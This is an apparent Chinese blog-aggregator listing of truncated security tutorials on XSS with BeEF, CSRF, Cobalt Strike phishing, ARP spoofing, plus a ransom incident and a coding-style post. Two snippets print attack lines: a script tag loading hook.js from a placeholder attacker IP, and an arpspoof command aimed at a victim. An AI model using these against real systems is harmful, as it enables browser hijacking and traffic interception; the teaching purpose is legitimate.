KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址: h ...
分类:
其他好文 时间:
2019-06-09 00:20:07
阅读次数:
288
为什么要设计好目录结构? "设计项目目录结构",就和"代码编码风格"一样,属于个人风格问题。对于这种风格上的规范,一直都存在两种态度: 我是比较偏向于后者的,因为我是前一类同学思想行为下的直接受害者。我曾经维护过一个非常不好读的项目,其实现的逻辑并不复杂,但是却耗费了我非常长的时间去理解它想表达的意 ...
分类:
其他好文 时间:
2019-06-08 18:52:23
阅读次数:
109
什么是CRSF 构建一个地址,比如说是删除某个博客网站博客的链接,然后诱使已经登录过该网站的用户点击恶意链接,可能会导致用户通过自己的手将曾经发布在该网站的博客在不知情的情况下删除了。这种构建恶意链接,假借受害者的手造成损失的攻击方式就叫CSRF 跨站点请求伪造。 浏览器Cookie策略 cooki ...
分类:
其他好文 时间:
2019-05-26 17:44:50
阅读次数:
121
1.Csrf攻击概念: csrf攻击(Cross-site request forgery):跨站请求伪造; 2.Csrf攻击原理: 用户是网站A的注册用户,且登录进去,于是网站A就给用户下发cookie。 从上图可以看出,要完成一次CSRF攻击,受害者必须满足两个必要的条件: (1)登录受信任网站 ...
分类:
其他好文 时间:
2019-05-24 18:55:33
阅读次数:
92
黑客擦除了微软多达392个代码存储库,并提出勒索要求。此前,黑客攻击了包含微软在内的大批受害者的Git存储库,删除了所有源代码和最近提交的内容,并留下了支持比特币支付的赎金票据。 勒索信息如下: “要恢复丢失的代码并避免泄漏:将比特币(BTC)发送到我们的比特币地址,并通过电子邮件admin@git ...
分类:
其他好文 时间:
2019-05-24 01:02:22
阅读次数:
126
System Profiler使用 System Profiler 模块,搜集目标的各类机器信息(操作系统版本,浏览器版本等) 当受害者访问http://192.168.5.6:80/oa链接时,会跳转到百度页面,同时Cobalt Strike会收集受害者信息,下面页面查看 hta 钓鱼 paylo ...
分类:
其他好文 时间:
2019-05-20 22:48:45
阅读次数:
143
首先我们对CRSF进行一个介绍 CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务 ...
分类:
其他好文 时间:
2019-05-19 14:08:11
阅读次数:
149
1.ARP协议是什么 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。 2.ARP欺骗原理 ARP欺骗的核心思想就是向目标主机发送伪造的 应 ARP答,并使目标主机接收应答中伪造的IP地址与MAC地址之间的映射对,以 ...
分类:
其他好文 时间:
2019-05-12 19:55:30
阅读次数:
155
所用工具:arpspoof , driftnet 攻击者:192.168.100.110 受害者:192.168.100.50 默认网关:192.168.100.2 1、攻击命令 # arpspoof -i eth0 -t 192.168.100.2 192.168.100.50 解释: eth0是 ...
分类:
其他好文 时间:
2019-05-07 16:59:34
阅读次数:
152
当太阳的光辉逐渐被月亮遮蔽,世界失去了光明,大地迎来最黑暗的时刻。。。。在这样的时刻,人们却异常兴奋——我们能在有生之年看到500年一遇的世界奇观,那是多么幸福的事儿啊~~ 但网路上总有那么些网站,开始借着民众的好奇心,打着介绍日食的旗号,大肆传播病毒。小t不幸成为受害者之一。小t如此生气,他决定要 ...
分类:
其他好文 时间:
2019-05-03 22:45:23
阅读次数:
168
